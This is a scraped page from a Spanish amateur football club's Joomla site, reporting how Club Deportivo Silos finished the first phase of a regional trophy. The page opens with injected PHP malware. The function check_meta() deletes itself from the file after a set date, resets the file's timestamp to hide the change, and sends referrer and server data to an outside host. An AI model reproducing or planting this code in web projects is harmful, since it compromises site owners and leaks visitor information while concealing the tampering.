check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Silos consigue el ascenso tras una magnífica temporada.

La Afición

Calendario

<<  Abril 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
       1  2
  3  4  5  6  7  8  9
10111213141516
17181920212223
24252627282930
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Silos consigue el ascenso tras una magnífica temporada. PDF Imprimir E-mail
Viernes, 29 de Enero de 2016 18:01

Finalizo la primera parte de la temporada para el Club Deportivo Silos, el objetivo principal era acceder a la segunda fase del trofeo diputación y se consiguió de forma brillante, solo el goalaverage impidió redondear una primera parte de la temporada donde se ha comportado como un equipo sólido y competitivo.

La temporada comenzaba contra Quintar, que a la postre acabaría ocupando el primer puesto del grupo, primeras victorias sufridas con remontadas incluidas, un empate fuera contra Huerta del Rey con decisiones arbitrales que no dejaron contento al equipo silense  y una victoria sufrida contra Puentedura fue lo más destacable de la primera vuelta.

La segunda vuelta comenzaba en Quintanar de la Sierra con un partido que se antojaba decisivo, solo la labor arbitral impidió puntuar a Silos después de sobreponerse a dos goles tempraneros del equipo local, la segunda vuelta siguió con victorias hasta la penúltima fecha, tras un partido disputado en el que Silos tuvo la victoria al alcance de la mano, Silos se dejaba dos puntos que le obligaban a buscar la heroica en el último partido contra Salas.

Se llegaba al final con la necesidad de marcar 10 goles para conseguir la ansiada primera plaza. Primera parte casi perfecta, Sancho y Cule se entendían a las mil maravillas, el marcador no paraba de moverse, rápidamente Silos tomo ventaja, de aquí al final de la primera parte tres goles de Sancho y dos de Cule dejaban el partido resuelto y con la única duda de si se llegaría a alcanzar la cifra de los 10 goles.

Cuando todo parecía con el viento a favor para seguir aumentando la diferencia de goles Silos se desconectó del partido, perdió la claridad arriba llegando incluso Adrian a tener que realizar alguna parada de mérito para seguir con la portería a cero, pasaban los minutos y cada vez se hacía más difícil hasta que finalmente con el pitido final se llegaba al final de esta primera fase.

Silos acaba como equipo menos goleado y accede al siguiente grupo, a priori de mucha dificultad.

El Club Deportivo Silos queda encuadrado en el grupo A-1 juanto a Rubena, Ubierna, Hoyales de Roa, Santa Maria del Campo, Cardeñadijo,y Cañizar de Argaño.

 

 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.